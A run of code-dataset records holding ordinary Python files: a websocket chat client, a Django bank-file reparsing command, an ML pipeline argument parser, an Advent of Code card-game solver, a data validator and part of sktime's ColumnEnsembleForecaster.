communication with the server.\"\"\"\n\n    connected_to_room = False\n\n    async def connect(self):\n        \"\"\"Connects to the server. Must be called in order for everything to work.\"\"\"\n        self.ws = await websockets.connect(URL)\n\n    async def _receive(self) -> Dict[str, Any]:\n        \"\"\"Receives a message from the server. Converts raw data to a python dict.\"\"\"\n        res = await self.ws.recv()\n        load = json.loads(res)\n        return load\n\n    async def _send(\n        self, type: str, payload: Dict[str, Any], reply: bool = True\n    ) -> Dict[str, Any]:\n        \"\"\"Sends a message to the server. Expects a reply by default.\"\"\"\n        req = json.dumps({\"type\": type, **payload})\n        await self.ws.send(req)\n        if reply:\n            return await self._receive()\n        else:\n            return {}\n\n    async def login(self, username: str, tag: int, password: str) -> bool:\n        \"\"\"\n        Sends a login request to the server.\n\n        Returns True if it was successful and False if not.\n        \"\"\"\n        payload = {\"username\": username, \"tag\": tag, \"password\": password}\n        res = await self._send(\"login\", payload)\n        return res[\"success\"]\n\n    async def logout(self) -> bool:\n        \"\"\"\n        Logs out the user.\n\n        Returns whether successful or not.\n        \"\"\"\n        res = await self._send(\"logout\", {})\n        return res[\"success\"]\n\n    async def register(self, username: str, password: str) -> int:\n        \"\"\"\n        Sends a register request to the server. Also logs the user in.\n\n        Returns the unique user tag of the new user.\n        \"\"\"\n        payload = {\"username\": username, \"password\": password}\n        res = await self._send(\"register\", payload)\n        return res[\"tag\"]\n\n    async def create_room(self, name: str) -> Tuple[int, int]:\n        \"\"\"\n        Asks the server to create a room with the given name. Also joins the room.\n\n        Returns (roomcode, roomid) of the newly created room.\n        Cannot fail. Authentication is required.\n        \"\"\"\n        payload = {\"name\": name}\n        res = await self._send(\"createroom\", payload)\n        return (res[\"code\"], res[\"id\"])\n\n    async def join_room(self, code: str) -> Dict[str, Any]:\n        \"\"\"\n        Joins the room with the given code.\n\n        Returns the room information of the newly joined room.\n        Authentication required.\n        \"\"\"\n        payload = {\"code\": code}\n        res = await self._send(\"joinroom\", payload)\n        return res\n\n    async def connect_room(self, id: int) -> bool:\n        \"\"\"\n        Connects to a room.\n\n        Returns whether the connection was successful or not.\n        Authentication required. Joining room required.\n        \"\"\"\n        payload = {\"id\": id}\n        res = await self._send(\"roomconnect\", payload)\n        self.connected_to_room = res[\"success\"]\n        return res[\"success\"]\n\n    async def message_listener(self, callback: Callable[[str], None]) -> None:\n        \"\"\"\n        Starts a message receiving listener.\n\n        When a message is received, the callback function is called on the new message.\n        Authentication required. Connected room required.\n        \"\"\"\n        async for res in self.ws:\n            if not self.connected_to_room:\n                break\n            res = json.loads(res)\n            # if not a roomconnect message, then break\n            if res[\"type\"] != \"roomconnect\":\n                break\n            # edited message or new message\n            if \"new\" in res:\n                msg = res[\"new\"]\n                callback(msg) # make this the new_callback\n            elif \"update\" in res:\n                msg = res[\"update\"]\n                # update_callback(msg) not implemented\n            else:\n                break\n\n    async def send_message(self, message: str) -> bool:\n        \"\"\"\n        Sends a message to the server.\n\n        Does not expect a reply from the server.\n        Authentication required. 
Connected room required.\n \"\"\"\n enhanced_message = message\n if \"*\" not in [message[0], message[-1]]:\n if random.random() < 0.05:\n enhanced_message = ciphers.random_cipher(message)\n else:\n if random.random() > 0.5:\n enhanced_message = autotranslater.random_autotranslate(message)\n else:\n enhanced_message = autocorrecter.random_autocorrect(message)\n payload = {\"content\": enhanced_message, \"action\": \"send\"}\n await self._send(\"roomconnect\", payload, reply=False)\n return True\n\n async def exit_room(self) -> bool:\n \"\"\"\n Exits the currently connected room.\n\n Returns whether succesful or not.\n Authentication required. Connected room required.\n \"\"\"\n payload = {\"end\": True}\n await self._send(\"roomconnect\", payload, reply=False)\n self.connected_to_room = False\n return True\n\n async def list_rooms(self) -> List[Dict[str, Any]]:\n \"\"\"\n Asks server for a list of rooms that the current user has joined.\n\n Returns list of connected rooms.\n Authentication required. Operation cannot fail.\n \"\"\"\n res = await self._send(\"listrooms\", {})\n return res[\"servers\"]\n\n async def change_name(self, new_name: str) -> bool:\n \"\"\"\n Asks the server to change currently logged in users name.\n\n Returns whether successful or not.\n Authentication required.\n \"\"\"\n payload = {\"name\": new_name}\n res = await self._send(\"changename\", payload)\n return res[\"success\"]\n\n async def leave_room(self, id: int) -> bool:\n \"\"\"\n Unjoins the room with specified id.\n\n Returns whether successful or not.\n Authentication required. Must have already joined the room.\n \"\"\"\n payload = {\"id\": id}\n res = await self._send(\"leaveroom\", payload)\n return res[\"success\"]\n", "repo_name": "srijal30/genuine-djinn", "sub_path": "client/gui/connection/connection.py", "file_name": "connection.py", "file_ext": "py", "file_size_in_byte": 6534, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "sys.path.insert", "line_number": 9, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 9, "usage_type": "call"}, {"api_name": "enhancers.message_processer.AutoCorrecter", "line_number": 21, "usage_type": "call"}, {"api_name": "enhancers.message_processer.AutoTranslater", "line_number": 22, "usage_type": "call"}, {"api_name": "websockets.connect", "line_number": 33, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 38, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 35, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 42, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "json.dumps", "line_number": 45, "usage_type": "call"}, {"api_name": "typing.Dict", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 43, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 81, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 92, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 92, "usage_type": "name"}, {"api_name": "typing.Callable", "line_number": 115, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 125, "usage_type": "call"}, {"api_name": "random.random", "line_number": 148, "usage_type": "call"}, {"api_name": "enhancers.ciphers.random_cipher", 
"line_number": 149, "usage_type": "call"}, {"api_name": "enhancers.ciphers", "line_number": 149, "usage_type": "name"}, {"api_name": "random.random", "line_number": 151, "usage_type": "call"}, {"api_name": "typing.List", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 171, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 171, "usage_type": "name"}]} +{"seq_id": "73634838246", "text": "# pylint: disable=logging-format-interpolation\nimport logging\nfrom django.core.management.base import CommandParser\nfrom jbank.models import ReferencePaymentBatchFile, ReferencePaymentRecord\nfrom jbank.svm import parse_svm_batches_from_file\nfrom jutil.command import SafeCommand\n\n\nlogger = logging.getLogger(__name__)\n\n\nclass Command(SafeCommand):\n help = \"Re-parses old bank settlement .SVM (saapuvat viitemaksut) files. Used for adding missing fields.\"\n\n def add_arguments(self, parser: CommandParser):\n parser.add_argument(\"--file\", type=str)\n\n def do(self, *args, **options):\n logger.info(\"Re-parsing SVM files to update fields\")\n qs = ReferencePaymentBatchFile.objects.all()\n if options[\"file\"]:\n qs = qs.filter(file=options[\"file\"])\n for file in qs.order_by(\"id\"):\n assert isinstance(file, ReferencePaymentBatchFile)\n logger.info(\"Processing {} BEGIN\".format(file))\n batches = parse_svm_batches_from_file(file.full_path)\n for batch in batches:\n for e in batch[\"records\"]: # pylint: disable=too-many-branches\n # check missing line_number\n e2 = ReferencePaymentRecord.objects.filter(\n batch__file=file,\n line_number=0,\n record_type=e[\"record_type\"],\n account_number=e[\"account_number\"],\n paid_date=e[\"paid_date\"],\n archive_identifier=e[\"archive_identifier\"],\n remittance_info=e[\"remittance_info\"],\n payer_name=e[\"payer_name\"],\n currency_identifier=e[\"currency_identifier\"],\n name_source=e[\"name_source\"],\n correction_identifier=e[\"correction_identifier\"],\n delivery_method=e[\"delivery_method\"],\n receipt_code=e[\"receipt_code\"],\n ).first()\n if e2:\n e2.line_number = e[\"line_number\"]\n e2.save()\n logger.info(\"Updated {} line number to {}\".format(e2, e2.line_number))\n logger.info(\"Processing {} END\".format(file))\n", "repo_name": "kajala/django-jbank", "sub_path": "jbank/management/commands/reparse_svm.py", "file_name": "reparse_svm.py", "file_ext": "py", "file_size_in_byte": 2286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 9, "usage_type": "call"}, {"api_name": "jutil.command.SafeCommand", "line_number": 12, "usage_type": "name"}, {"api_name": "django.core.management.base.CommandParser", "line_number": 15, "usage_type": "name"}, {"api_name": "jbank.models.ReferencePaymentBatchFile.objects.all", "line_number": 20, "usage_type": "call"}, {"api_name": "jbank.models.ReferencePaymentBatchFile.objects", "line_number": 20, "usage_type": "attribute"}, {"api_name": "jbank.models.ReferencePaymentBatchFile", "line_number": 20, "usage_type": "name"}, {"api_name": "jbank.models.ReferencePaymentBatchFile", "line_number": 24, "usage_type": "argument"}, {"api_name": "jbank.svm.parse_svm_batches_from_file", "line_number": 26, "usage_type": "call"}, {"api_name": "jbank.models.ReferencePaymentRecord.objects.filter", "line_number": 30, "usage_type": "call"}, {"api_name": "jbank.models.ReferencePaymentRecord.objects", "line_number": 30, "usage_type": "attribute"}, {"api_name": 
"jbank.models.ReferencePaymentRecord", "line_number": 30, "usage_type": "name"}]} +{"seq_id": "69921329125", "text": "#! /usr/bin/python\n\n#### Imports\n# External Libraries\nimport argparse\nimport hashlib\nimport logging\nimport os\nimport sys\nimport textwrap\n\nfrom preprocess.preprocess import Preprocessor\nfrom train.train import Trainer\nfrom evaluate.evaluate import Evaluator\nfrom generate.generate import Generator\n\n#### Constants\n\n\n#### Logger\nlog = logging.getLogger(\"root\")\nLOG_FORMAT = \"[%(asctime)s] %(message)s\"\nlogging.basicConfig(format=LOG_FORMAT)\nlog.setLevel(logging.DEBUG)\n\n\ndef main():\n ### Parse and display arguments\n arguments = parse_arguments()\n\n ### Preprocess Data\n if arguments.preprocess:\n log.info(\"Running Preprocessor\")\n preprocessor = Preprocessor(arguments)\n preprocessor.run()\n\n ### Train Data\n if arguments.train:\n log.info(\"Running Trainer\")\n trainer = Trainer(arguments)\n trainer.run()\n\n ### Evaluate Data\n if arguments.evaluate:\n log.info(\"Running Evaluate\")\n evaluator = Evaluator(arguments)\n evaluator.run()\n\n ### Generate New Data\n if arguments.generate:\n log.info(\"Running Generate\")\n generator = Generator(arguments)\n generator.run()\n\n\ndef parse_arguments():\n ### Get Arguments\n parser = argparse.ArgumentParser(\n formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n description=textwrap.dedent(\"Description of the program.\"),\n epilog=\"Summary/notes/etc.\",\n )\n\n preprocess = parser.add_argument_group(\n \"Preprocessing Options\",\n \"Details on the Preprocessor, what to expect, etc.\",\n )\n\n preprocess.add_argument(\n \"-p\",\n \"--preprocess\",\n default=False,\n help=\"Preprocess Data\",\n action=\"store_true\",\n )\n\n preprocess.add_argument(\n \"-pi\",\n \"--preprocess_input_directory\",\n metavar=\"\\b\",\n default=None,\n help=\"Preprocessor Input Directory\",\n )\n\n preprocess.add_argument(\n \"-po\",\n \"--preprocess_output_dir\",\n metavar=\"\\b\",\n default=None,\n help=\"Preprocessor Output Directory\",\n )\n\n train = parser.add_argument_group(\n \"Training Options\",\n \"Details on the Training Options, what to expect, etc.\",\n )\n\n train.add_argument(\n \"-t\",\n \"--train\",\n default=False,\n help=\"Train On Data\",\n action=\"store_true\",\n )\n\n train.add_argument(\n \"--use_tensorboard\",\n default=False,\n help=\"Use a Tensorboard to Show Progress of Training\",\n action=\"store_true\",\n )\n\n evaluate = parser.add_argument_group(\n \"Evaluation Options\",\n \"Details on the Evaluation Options, what to expect, etc.\",\n )\n evaluate.add_argument(\n \"-e\",\n \"--evaluate\",\n default=False,\n help=\"Evaluate Data\",\n action=\"store_true\",\n )\n\n evaluate.add_argument(\n \"--batch_size\",\n default=128,\n metavar=\"\\b\",\n help=\"Batch Size for Evaluation Neural Network\",\n type=int,\n )\n\n evaluate.add_argument(\n \"--num_workers\",\n default=16,\n metavar=\"\\b\",\n help=\"Number of Workers for Evaluation Neural Network\",\n type=int,\n )\n\n generate = parser.add_argument_group(\n \"Generation Options\",\n \"Details on the Generation Options, what to expect, etc.\",\n )\n generate.add_argument(\n \"-g\",\n \"--generate\",\n default=False,\n help=\"Generate New Output\",\n action=\"store_true\",\n )\n\n arguments = parser.parse_args()\n log.info(\"Preprocess - %s\" % arguments.preprocess)\n log.info(\"Preprocess Input Dir - %s\" % arguments.preprocess_input_directory)\n log.info(\"Preprocess Output Dir - %s\" % arguments.preprocess_output_dir)\n 
log.info(\"Train - %s\" % arguments.train)\n log.info(\"Evaluate - %s\" % arguments.evaluate)\n log.info(\"Generate - %s\" % arguments.generate)\n\n return arguments\n\n\nif __name__ == \"__main__\":\n main()\n", "repo_name": "john-d-murphy/lmm_example_loader", "sub_path": "lmm_example_loader.py", "file_name": "lmm_example_loader.py", "file_ext": "py", "file_size_in_byte": 4018, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 21, "usage_type": "call"}, {"api_name": "logging.basicConfig", "line_number": 23, "usage_type": "call"}, {"api_name": "logging.DEBUG", "line_number": 24, "usage_type": "attribute"}, {"api_name": "preprocess.preprocess.Preprocessor", "line_number": 34, "usage_type": "call"}, {"api_name": "train.train.Trainer", "line_number": 40, "usage_type": "call"}, {"api_name": "evaluate.evaluate.Evaluator", "line_number": 46, "usage_type": "call"}, {"api_name": "generate.generate.Generator", "line_number": 52, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 58, "usage_type": "call"}, {"api_name": "argparse.ArgumentDefaultsHelpFormatter", "line_number": 59, "usage_type": "attribute"}, {"api_name": "textwrap.dedent", "line_number": 60, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 64, "usage_type": "name"}, {"api_name": "preprocess.preprocess.add_argument", "line_number": 69, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 69, "usage_type": "name"}, {"api_name": "preprocess.preprocess.add_argument", "line_number": 77, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 77, "usage_type": "name"}, {"api_name": "preprocess.preprocess.add_argument", "line_number": 85, "usage_type": "call"}, {"api_name": "preprocess.preprocess", "line_number": 85, "usage_type": "name"}, {"api_name": "train.train", "line_number": 93, "usage_type": "name"}, {"api_name": "train.train.add_argument", "line_number": 98, "usage_type": "call"}, {"api_name": "train.train", "line_number": 98, "usage_type": "name"}, {"api_name": "train.train.add_argument", "line_number": 106, "usage_type": "call"}, {"api_name": "train.train", "line_number": 106, "usage_type": "name"}, {"api_name": "evaluate.evaluate", "line_number": 113, "usage_type": "name"}, {"api_name": "evaluate.evaluate.add_argument", "line_number": 117, "usage_type": "call"}, {"api_name": "evaluate.evaluate", "line_number": 117, "usage_type": "name"}, {"api_name": "evaluate.evaluate.add_argument", "line_number": 125, "usage_type": "call"}, {"api_name": "evaluate.evaluate", "line_number": 125, "usage_type": "name"}, {"api_name": "evaluate.evaluate.add_argument", "line_number": 133, "usage_type": "call"}, {"api_name": "evaluate.evaluate", "line_number": 133, "usage_type": "name"}, {"api_name": "generate.generate", "line_number": 141, "usage_type": "name"}, {"api_name": "generate.generate.add_argument", "line_number": 145, "usage_type": "call"}, {"api_name": "generate.generate", "line_number": 145, "usage_type": "name"}]} +{"seq_id": "27927530271", "text": "from typing import List\n\n\nDeck = List[int]\n\n\ndef play_round(player_1: Deck, player_2: Deck):\n card_1 = player_1.pop(0)\n card_2 = player_2.pop(0)\n if card_1 > card_2:\n player_1.append(card_1)\n player_1.append(card_2)\n elif card_2 > card_1:\n player_2.append(card_2)\n player_2.append(card_1)\n\n\ndef play_game(player_1: Deck, player_2: Deck) -> int:\n turns = 0\n while 
len(player_1) > 0 and len(player_2) > 0:\n play_round(player_1, player_2)\n turns += 1\n return turns\n\n\ndef play_round_recursive(player_1: Deck, player_2: Deck):\n card_1 = player_1.pop(0)\n card_2 = player_2.pop(0)\n if len(player_1) >= card_1 and len(player_2) >= card_2:\n sub_game_1 = player_1.copy()[:card_1]\n sub_game_2 = player_2.copy()[:card_2]\n play_game_recursive(sub_game_1, sub_game_2)\n if len(sub_game_1) == 0:\n player_2.append(card_2)\n player_2.append(card_1)\n elif len(sub_game_2) == 0:\n player_1.append(card_1)\n player_1.append(card_2)\n else:\n raise ValueError(f'ERROR - unexpected scenario: player 1: {player_1}, player_2: {player_2}')\n else:\n if card_1 > card_2:\n player_1.append(card_1)\n player_1.append(card_2)\n elif card_2 > card_1:\n player_2.append(card_2)\n player_2.append(card_1)\n\n\ndef play_game_recursive(player_1: Deck, player_2: Deck):\n positions = []\n while len(player_1) > 0 and len(player_2) > 0:\n if (player_1, player_2) not in positions:\n positions.append((player_1.copy(), player_2.copy()))\n play_round_recursive(player_1, player_2)\n else:\n player_2.clear()\n\n\ndef score_deck(deck: Deck) -> int:\n score = 0\n for i in range(len(deck)):\n score += deck[i] * (len(deck) - i)\n return score\n\n\ndef main():\n player_1 = [47, 19, 22, 31, 24, 6, 10, 5, 1, 48, 46, 27, 8, 45, 16, 28, 33, 41, 42, 36, 50, 39, 30, 11, 17]\n player_2 = [4, 18, 21, 37, 34, 15, 35, 38, 20, 23, 9, 25, 32, 13, 26, 2, 12, 44, 14, 49, 3, 40, 7, 43, 29]\n play_game(player_1, player_2)\n winning_deck = player_1\n if player_2:\n winning_deck = player_2\n score = score_deck(winning_deck)\n print(f'the winning deck has a score of {score}')\n player_1 = [47, 19, 22, 31, 24, 6, 10, 5, 1, 48, 46, 27, 8, 45, 16, 28, 33, 41, 42, 36, 50, 39, 30, 11, 17]\n player_2 = [4, 18, 21, 37, 34, 15, 35, 38, 20, 23, 9, 25, 32, 13, 26, 2, 12, 44, 14, 49, 3, 40, 7, 43, 29]\n play_game_recursive(player_1, player_2)\n winning_deck = player_1\n if player_2:\n winning_deck = player_2\n score = score_deck(winning_deck)\n print(f'the winning deck in the recursive version has a score of {score}')\n\n\n\nif __name__ == '__main__':\n main()", "repo_name": "mikealfare/advent-of-code-2020", "sub_path": "src/advent_of_code/day_22.py", "file_name": "day_22.py", "file_ext": "py", "file_size_in_byte": 2811, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.List", "line_number": 4, "usage_type": "name"}]} +{"seq_id": "28010045840", "text": "import re\nfrom data import Data\nfrom time import strptime\n\n\nclass DataValidator:\n\n def __init__(self):\n # A function list if validators\n self.validators = (\n self.check_empid, self.check_gender, self.check_age,\n self.check_sales, self.check_bmi, self.check_salary,\n self.check_birthday\n )\n\n def regx_match(self, pattern, data):\n result = None\n match_obj = re.match(pattern, str(data), re.I)\n if match_obj:\n result = match_obj.group(1)\n return result\n\n def regx_match_group(self, pattern, data):\n result = None\n match_obj = re.match(pattern, str(data), re.I)\n if match_obj:\n result = match_obj.groups()\n return result\n\n def check_empid(self, data):\n \"\"\"\n Check if the input empID is valid.\n :return: Formatted empid if the input one is valid,\n otherwise, return None\n Author: Vaishali Patel\n \"\"\"\n pattern = r\"^(?P<empid>[A-Z][0-9]{3})$\"\n result = self.regx_match(pattern, data)\n if result is not None:\n return result.upper()\n\n return result\n\n def 
check_gender(self, data):\n        \"\"\"\n        Check validation of gender\n        :param data: <String>\n        :return: washed data\n        :Author: Zhiming Liu\n        \"\"\"\n        pattern_01 = r\"^(?P<gender>F|girl|female|miss|ms)$\"\n        pattern_02 = r\"^(?P<gender>M|boy|male|mister|mr)$\"\n\n        result = self.regx_match(pattern_01, data)\n        if result is not None:\n            return 'F'\n\n        result = self.regx_match(pattern_02, data)\n        if result is not None:\n            return \"M\"\n\n    def check_age(self, data):\n        \"\"\"\n        Check validation of age\n        :param data: <String>\n        :return: washed data\n        :Author: Zhiming Liu\n        \"\"\"\n        pattern = r\"^(?P<age>[0-9]{1,2})$\"\n        result = self.regx_match(pattern, data)\n        if result is not None:\n            return \"{0:02}\".format(int(result))\n        return result\n\n    def check_sales(self, data):\n        \"\"\"\n        Check if the input sales is valid.\n        :return: Formatted sales if the input one is valid,\n        otherwise, return None\n        :Author: Zhiming Liu\n        \"\"\"\n        pattern = r\"^(?P<sales>[0-9]{1,3})$\"\n        result = self.regx_match(pattern, data)\n        if result is not None:\n            return \"{0:03}\".format(int(result))\n        return result\n\n    def check_bmi(self, data):\n        \"\"\"\n        Check if the input BMI is valid.\n        :return: Formatted BMI if the input one is valid,\n        otherwise, return None\n        :Author: Zhiming Liu\n        \"\"\"\n        pattern = r\"^(?P<bmi>normal|overweight|obesity|underweight)$\"\n        result = self.regx_match(pattern, data)\n        if result is not None:\n            return \" \".join(text[0].upper() + text[1:]\n                            for text in result.split())\n        return result\n\n    def check_salary(self, data):\n        \"\"\"\n        Check if the input salary is valid.\n        :return: Formatted salary if the input one is valid,\n        otherwise, return None\n        :Author: Zhiming Liu\n        \"\"\"\n        pattern = r\"^(?P<salary>[0-9]{2,3})$\"\n        result = self.regx_match(pattern, data)\n        if result is not None:\n            return \"{0:03}\".format(int(result))\n        return result\n\n    def check_birthday(self, data):\n        \"\"\"\n        Check validation of birthday\n        :param data: <String>\n        :return: washed data\n        :Author: Zhiming Liu\n        \"\"\"\n        pattern = r\"^([0-9]{1,2})[-/\\.]([0-9]{1,2})[-/\\.]([0-9]{2}|[0-9]{4})$\"\n        result = self.regx_match_group(pattern, data)\n        if result is not None:\n            date = strptime(\"-\".join(result), \"%d-%m-%Y\")\n            return \"{0:02}-{1:02}-{2:04}\"\\\n                .format(date.tm_mday, date.tm_mon, date.tm_year)\n\n        return result\n\n    def check_all(self, all_data: list):\n        \"\"\"\n        Check validation of all the data. 
Throw ValueError Exceptions.\n :param all_data: a data list\n :return: washed data in dictionary\n :Author: Zhiming Liu\n \"\"\"\n # Save the washed data temporarily\n result = []\n\n # If the number of the data is not correct, return an empty result\n if not len(all_data) == len(Data):\n return result\n\n # Check and wash data\n key = 0\n while key < len(all_data):\n # Get the validation function by the order of the data\n v = self.validators[key]\n # Append to the result\n result.append(v(all_data[key]))\n key += 1\n\n return result\n\n\n# print(DataValidator.check_bmi(\"jbjndsoidiri88888normaljdjdjd\"))\n# v = DataValidator()\n# print(DataValidator.check_birthday(\"31-02-1990\"))\n", "repo_name": "heyerique/Refactoring", "sub_path": "src/data_validator.py", "file_name": "data_validator.py", "file_ext": "py", "file_size_in_byte": 4826, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.match", "line_number": 18, "usage_type": "call"}, {"api_name": "re.I", "line_number": 18, "usage_type": "attribute"}, {"api_name": "re.match", "line_number": 25, "usage_type": "call"}, {"api_name": "re.I", "line_number": 25, "usage_type": "attribute"}, {"api_name": "time.strptime", "line_number": 125, "usage_type": "call"}, {"api_name": "data.Data", "line_number": 142, "usage_type": "argument"}]} +{"seq_id": "33997802920", "text": "__author__ = [\"GuzalBulatova\", \"mloning\", \"fkiraly\"]\n__all__ = [\"ColumnEnsembleForecaster\"]\n\nfrom sktime.base._meta import _ColumnEstimator\nfrom sktime.forecasting.base._base import BaseForecaster\nfrom sktime.forecasting.base._meta import _HeterogenousEnsembleForecaster\n\n# mtypes that are native pandas\n# ColumnEnsembleForecaster uses these internally, since we need (pandas) columns\nPANDAS_MTYPES = [\"pd.DataFrame\", \"pd-multiindex\", \"pd_multiindex_hier\"]\n\n\nclass ColumnEnsembleForecaster(_HeterogenousEnsembleForecaster, _ColumnEstimator):\n \"\"\"Forecast each series with separate forecaster.\n\n Applies different forecasters by columns.\n\n `ColumnEnsembleForecaster` is passed forecaster/index pairs, exact syntax below.\n Index can be single pandas index element, pd.Index, int, str, or list thereof.\n If iterable (pd.Index, list), refers to multiple columns.\n\n Behaviour in `fit`, `predict`, `update`:\n For index pairs f_i, ix_i passed, applies forecaster f_i to column(s) ix_i.\n `predict` results are concatenated to one container with same columns as in `fit`.\n\n Parameters\n ----------\n forecasters : sktime forecaster, or list of tuples (str, estimator, int or pd.index)\n if tuples, with name = str, estimator is forecaster, index as int or index\n if last element is index, it must be int, str, or pd.Index coercible\n if last element is int x, and is not in columns, is interpreted as x-th column\n all columns must be present in an index\n\n If forecaster, clones of forecaster are applied to all columns.\n If list of tuples, forecaster in tuple is applied to column with int/str index\n\n Examples\n --------\n .. Doctest::\n\n >>> import pandas as pd\n >>> from sktime.forecasting.compose import ColumnEnsembleForecaster\n >>> from sktime.forecasting.naive import NaiveForecaster\n >>> from sktime.forecasting.trend import PolynomialTrendForecaster\n >>> from sktime.datasets import load_longley\n\n Using integers (column iloc references) for indexing:\n\n .. Doctest::\n\n >>> y = load_longley()[1][[\"GNP\", \"UNEMP\"]]\n >>> forecasters = [\n ... 
(\"trend\", PolynomialTrendForecaster(), 0),\n ... (\"naive\", NaiveForecaster(), 1),\n ... ]\n >>> forecaster = ColumnEnsembleForecaster(forecasters=forecasters)\n >>> forecaster.fit(y, fh=[1, 2, 3])\n ColumnEnsembleForecaster(...)\n >>> y_pred = forecaster.predict()\n\n Using strings for indexing:\n\n .. Doctest::\n\n >>> df = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6]})\n >>> fc = ColumnEnsembleForecaster(\n ... [(\"foo\", NaiveForecaster(), \"a\"), (\"bar\", NaiveForecaster(), \"b\")]\n ... )\n >>> fc.fit(df, fh=[1, 42])\n ColumnEnsembleForecaster(...)\n >>> y_pred = fc.predict()\n\n Applying one forecaster to multiple columns, multivariate:\n\n .. Doctest::\n\n >>> df = pd.DataFrame({\"a\": [1, 2, 3], \"b\": [4, 5, 6], \"c\": [7, 8, 9]})\n >>> fc = ColumnEnsembleForecaster(\n ... [(\"ab\", NaiveForecaster(), [\"a\", 1]), (\"c\", NaiveForecaster(), 2)]\n ... )\n >>> fc.fit(df, fh=[1, 42])\n ColumnEnsembleForecaster(...)\n >>> y_pred = fc.predict()\n \"\"\"\n\n _tags = {\n \"scitype:y\": \"both\",\n \"ignores-exogeneous-X\": False,\n \"y_inner_mtype\": PANDAS_MTYPES,\n \"X_inner_mtype\": PANDAS_MTYPES,\n \"requires-fh-in-fit\": False,\n \"handles-missing-data\": False,\n \"capability:pred_int\": True,\n \"capability:pred_int:insample\": True,\n }\n\n # for default get_params/set_params from _HeterogenousMetaEstimator\n # _steps_attr points to the attribute of self\n # which contains the heterogeneous set of estimators\n # this must be an iterable of (name: str, estimator, ...) tuples for the default\n _steps_attr = \"_forecasters\"\n # if the estimator is fittable, _HeterogenousMetaEstimator also\n # provides an override for get_fitted_params for params from the fitted estimators\n # the fitted estimators should be in a different attribute, _steps_fitted_attr\n # this must be an iterable of (name: str, estimator, ...) tuples for the default\n _steps_fitted_attr = \"forecasters_\"\n\n def __init__(self, forecasters):\n self.forecasters = forecasters\n super().__init__(forecasters=forecasters)\n\n # set requires-fh-in-fit depending on forecasters\n if isinstance(forecasters, BaseForecaster):\n tags_to_clone = [\n \"requires-fh-in-fit\",\n \"capability:pred_int\",\n \"ignores-exogeneous-X\",\n \"handles-missing-data\",\n ]\n self.clone_tags(forecasters, tags_to_clone)\n else:\n l_forecasters = [(x[0], x[1]) for x in forecasters]\n self._anytagis_then_set(\"requires-fh-in-fit\", True, False, l_forecasters)\n self._anytagis_then_set(\"capability:pred_int\", False, True, l_forecasters)\n self._anytagis_then_set(\"ignores-exogeneous-X\", False, True, l_forecasters)\n self._anytagis_then_set(\"handles-missing-data\", False, True, l_forecasters)\n\n @property\n def _forecasters(self):\n \"\"\"Make internal list of forecasters.\n\n The list only contains the name and forecasters, dropping the columns. 
This is\n        for the implementation of get_params via _HeterogenousMetaEstimator._get_params\n        which expects lists of tuples of len 2.\n        \"\"\"\n        forecasters = self.forecasters\n        if isinstance(forecasters, BaseForecaster):\n            return [(\"forecasters\", forecasters)]\n        else:\n            return [(name, forecaster) for name, forecaster, _ in self.forecasters]\n\n    @_forecasters.setter\n    def _forecasters(self, value):\n        if len(value) == 1 and isinstance(value, BaseForecaster):\n            self.forecasters = value\n        elif len(value) == 1 and isinstance(value, list):\n            self.forecasters = value[0][1]\n        else:\n            self.forecasters = [\n                (name, forecaster, columns)\n                for ((name, forecaster), (_, _, columns)) in zip(\n                    value, self.forecasters\n                )\n            ]\n\n    def _fit(self, y, X, fh):\n        \"\"\"Fit to training data.\n\n        Parameters\n        ----------\n        y : pd.DataFrame\n            Target time series to which to fit the forecaster.\n        fh : int, list or np.array, optional (default=None)\n            The forecasting horizon with the steps ahead to predict.\n        X : pd.DataFrame, optional (default=None)\n            Exogenous variables are ignored.\n\n        Returns\n        -------\n        self : returns an instance of self.\n        \"\"\"\n        forecasters = self._check_forecasters(y)\n\n        self.forecasters_ = []\n        self.y_columns = list(y.columns)\n\n        for name, forecaster, index in forecasters:\n            forecaster_ = forecaster.clone()\n\n            pd_index = self._coerce_to_pd_index(index, self._y.columns)\n\n            forecaster_.fit(y.loc[:, pd_index], X, fh)\n            self.forecasters_.append((name, forecaster_, index))\n\n        return self\n\n    def _update(self, y, X=None, update_params=True):\n        \"\"\"Update fitted parameters.\n\n        Parameters\n        ----------\n        y : pd.DataFrame\n        X : pd.DataFrame\n        update_params : bool, optional, default=True\n\n        Returns\n        -------\n        self : an instance of self.\n        \"\"\"\n        for _, forecaster, index in self.forecasters_:\n            pd_index = self._coerce_to_pd_index(index, self._y.columns)\n            forecaster.update(y.loc[:, pd_index], X, update_params=update_params)\n        return self\n\n    def _predict(self, fh=None, X=None):\n        \"\"\"Forecast time series at future horizon.\n\n        private _predict containing the core logic, called from predict\n\n        State required:\n            Requires state to be 